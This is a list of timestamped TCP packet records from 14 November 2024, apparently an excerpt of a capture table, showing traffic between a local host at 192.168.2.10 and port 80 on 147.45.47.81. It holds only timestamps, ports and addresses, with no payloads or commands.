                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266433954 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266441107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266450882 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266454935 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266464949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266467094 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266485929 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266494036 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266503096 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266514063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266524076 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266525030 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266535997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266546011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266556025 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266561985 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266561985 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266576052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266592026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266596079 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266602993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266613007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266618013 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266623020 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266633034 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266638041 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266694069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266757011 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266757011 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266887903 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266900063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266910076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266920090 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266931057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266941071 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266946077 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266946077 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266952991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266963959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266973019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266983986 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266988993 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267009020 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267064095 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267071009 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267088890 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267100096 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267143965 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267143965 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267254114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267265081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267275095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267286062 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267297029 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267307043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267307997 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267322063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267330885 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267333984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267349958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267358065 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267360926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267370939 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267374992 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267381907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267404079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267416000 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267419100 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267431974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267442942 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267452955 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267460108 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267466068 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267467022 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267510891 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267510891 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267628908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267641068 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267651081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267661095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267678022 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267689943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267699003 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267707109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267718077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267729044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267739058 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267740011 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267749071 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267786026 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267797947 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267865896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267877102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267893076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267901897 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267915964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267916918 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267927885 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267927885 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267937899 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267951012 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.267951965 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268048048 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268059969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268070936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268080950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268089056 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268091917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268095016 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268102884 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268114090 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268126965 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268181086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268192053 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268203974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268208981 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268214941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268225908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268237114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268246889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268251896 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268259048 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268270016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268269062 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268327951 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268347979 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268357992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268368006 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268378019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268484116 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268501043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268507957 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268512011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268523932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268532991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268543005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268544912 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268553972 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268563986 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268573999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268584013 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268594027 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268599033 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268604994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268605947 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268621922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268625975 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268632889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268642902 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268647909 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268655062 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268665075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268675089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268678904 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268678904 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268686056 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268697023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268707037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268717051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268719912 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268728018 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268743992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268747091 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268755913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268776894 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268906116 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268960953 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268971920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268981934 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.268992901 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269002914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269025087 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269115925 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269126892 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269136906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269140959 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269148111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269157887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269160986 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269169092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269179106 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269181013 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269188881 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269201040 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269208908 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269211054 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269222021 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269232035 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269244909 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269251108 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269253016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269263983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269273996 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269284964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269294024 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269296885 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269304991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269315004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269325018 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269335032 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269345045 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269351959 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269351959 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269355059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269366026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269376993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269414902 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269414902 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269510984 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269582033 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269593000 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269615889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269640923 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269642115 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269651890 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269661903 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269673109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269682884 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269682884 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269694090 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269704103 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269726992 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269793034 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269804001 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269813061 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269815922 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269826889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269838095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269848108 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269850016 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269857883 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269869089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269879103 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269885063 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269889116 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269892931 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269900084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269913912 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269921064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269932985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269942999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269944906 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269953966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269964933 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269968033 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269974947 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269985914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269985914 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.269996881 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270006895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270016909 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270030975 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270034075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270045996 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270162106 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270205975 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270261049 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270416021 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270427942 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270437956 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270442009 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270448923 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270458937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270467997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270478964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270482063 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270489931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270499945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270502090 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270510912 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270543098 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270560026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270572901 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270582914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270586014 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270593882 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270603895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270615101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270616055 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270623922 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270625114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270637035 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270647049 CET8049958147.45.47.81192.168.2.10
